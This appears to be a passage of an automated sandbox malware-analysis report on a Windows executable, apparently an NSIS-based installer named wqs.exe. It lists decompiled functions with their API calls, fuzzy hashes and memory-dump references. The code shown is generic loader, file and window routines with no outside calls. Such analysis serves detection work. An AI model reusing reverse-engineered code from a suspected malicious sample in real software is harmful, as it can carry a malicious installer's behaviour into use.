API String ID: 1716503409-944333549
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 63b08ec129b2d444bb4d6071fe07264351bf49196043fdffe621f9561a8b612b
Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
Opcode Fuzzy Hash: 63b08ec129b2d444bb4d6071fe07264351bf49196043fdffe621f9561a8b612b
Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce50; // 0x2d48ff8
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E0040657A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce50; // 0x2d48ff8
						 *_t34 = _t12;
						 *0x40ce50 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x2d48ffc
							E0040653D(_t30, _t3);
							_push(_t33);
							 *0x40ce50 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E0040653D(_t32, _t33 + 4);
								_t22 =  *0x40ce50; // 0x2d48ff8
								E0040653D(_t36, _t22 + 4);
								_t25 =  *0x40ce50; // 0x2d48ff8
								_push(_t32);
								_push(_t25 + 4);
								E0040653D();
								L15:
								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E0040657A(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405B9D();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

APIs

GlobalFree.KERNEL32(02D48FF8), ref: 00401C0B
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000), ref: 00406779

Strings

Call, xrefs: 00401BC2, 00401BC8, 00401BE2

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Global$AllocFreelstrcatlstrlen
String ID: Call
API String ID: 3292104215-1824292864
Opcode ID: 4fd3103ddbbf3038e738bd6255fa64635d35017c94b9f6e6824ea6dd5921d07e
Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
Opcode Fuzzy Hash: 4fd3103ddbbf3038e738bd6255fa64635d35017c94b9f6e6824ea6dd5921d07e
Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8));
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(0x441000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

APIs

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1

SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: a0d011628c810d07a54685ac6612ef99f8e632c27b07218bf1f4fe72126052a1
Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
Opcode Fuzzy Hash: a0d011628c810d07a54685ac6612ef99f8e632c27b07218bf1f4fe72126052a1
Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
Opcode Fuzzy Hash: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D

Uniqueness

Uniqueness Score: -1.00%

Function 00405B20 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B20(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430270->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405b29
0x00405b49
0x00405b51
0x00405b56
0x00000000
0x00405b5c
0x00405b60

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
CloseHandle.KERNEL32(?), ref: 00405B56

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x433ed0; // 0x502cc
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
					_t4 =  *(_t16 - 0x30);
				}
				_t12 =  *0x433ee4; // 0x170250
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00401573
0x00401573
0x00401581
0x00401587
0x00401589
0x00401589
0x0040158c
0x00401594
0x0040159c
0x0040159c
0x00402c2d
0x00402c39

APIs

ShowWindow.USER32(000502CC,?), ref: 00401587
ShowWindow.USER32(00170250), ref: 0040159C

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 830d7a4ba9a8f24a7d9b261e52e8913face7f91c13cb0f59137def6ec9c3a180
Instruction ID: a156d7c756385a3c588793d51facb92f34767ed8181f20582b2048d309791e4b
Opcode Fuzzy Hash: 830d7a4ba9a8f24a7d9b261e52e8913face7f91c13cb0f59137def6ec9c3a180
Instruction Fuzzy Hash: 25E04F76B101149BCB05DFA8ED908AEB3A6EB84311314483BE502B3290D675AD048B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406912
0x00406915
0x0040691c
0x00406924
0x00406930
0x00000000
0x00406937
0x00406927
0x0040692e
0x00000000
0x0040693f
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406031
0x0040603e
0x00406053
0x00406059

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\AppData\Roaming\wqs.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
